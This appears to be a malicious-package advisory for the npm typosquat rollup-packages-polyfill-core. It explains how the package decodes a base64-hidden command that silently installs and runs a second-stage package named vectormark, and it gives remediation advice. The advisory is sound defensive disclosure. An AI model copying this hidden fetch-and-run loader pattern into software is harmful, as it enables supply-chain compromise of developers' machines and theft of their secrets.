MAL-2026-10160
Dashboard / Malicious Package / MAL-2026-10160
MAL-2026-10160
Summary: Malicious code in rollup-packages-polyfill-core (npm)
Details: Source: amazon-inspector (2dfdfbd2fc737f9d78ec40aac8b7020866cb0ef0e7e14b2d95aa174ea0ec5818) On require of the main entry `dist/index.js`, the module decodes a base64 literal to the shell command `npm install vectormark --no-save --silent --no-audit --no-fund` and spawns it with `stdio: 'ignore'`. It then decodes a second base64 literal to the string `vectormark`, `require`s that dynamically-installed module, and immediately invokes `svgo.getPlugin()()`, executing arbitrary code from the second-stage package. The install target is unpinned and installed with `--no-save`, so the dropped code is not recorded in the consumer's lockfile. Both the shell command and the target module name are stored as base64 strings (`Buffer.from(..., 'base64').toString('utf8')`) to hide them from static review. The package name `rollup-packages-polyfill-core` typosquats the legitimate `rollup-plugin-polyfill-node`, whose repository it also declares. Source: ghsa-malware (9b4d6b267c6acf02bfba1366c8d1fe3e3285f2fd492a34d2c499e33d7d2efcff) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
References: https://www.npmjs.com/package/rollup-packages-polyfill-core/v/0.13.8, https://www.npmjs.com/package/rollup-packages-polyfill-core/v/0.13.7, https://www.npmjs.com/package/rollup-packages-polyfill-core/v/0.14.1, https://www.npmjs.com/package/rollup-packages-polyfill-core/v/0.13.9, https://www.npmjs.com/package/rollup-packages-polyfill-core/v/0.14.0, https://github.com/advisories/GHSA-vw6c-rv4h-v5pw, https://www.npmjs.com/package/rollup-packages-polyfill-core/v/0.13.5, https://www.npmjs.com/package/rollup-packages-polyfill-core/v/0.13.6, https://www.npmjs.com/package/rollup-packages-polyfill-core/v/0.13.4, https://research.jfrog.com/post/rollup-polyfill-masquerading, https://github.com/advisories/GHSA-pvcw-374v-r92p
Affected packages
Package
Name: rollup-packages-polyfill-core
Purl: pkg:npm/rollup-packages-polyfill-core
Affected ranges
Type: SEMVER
Events:
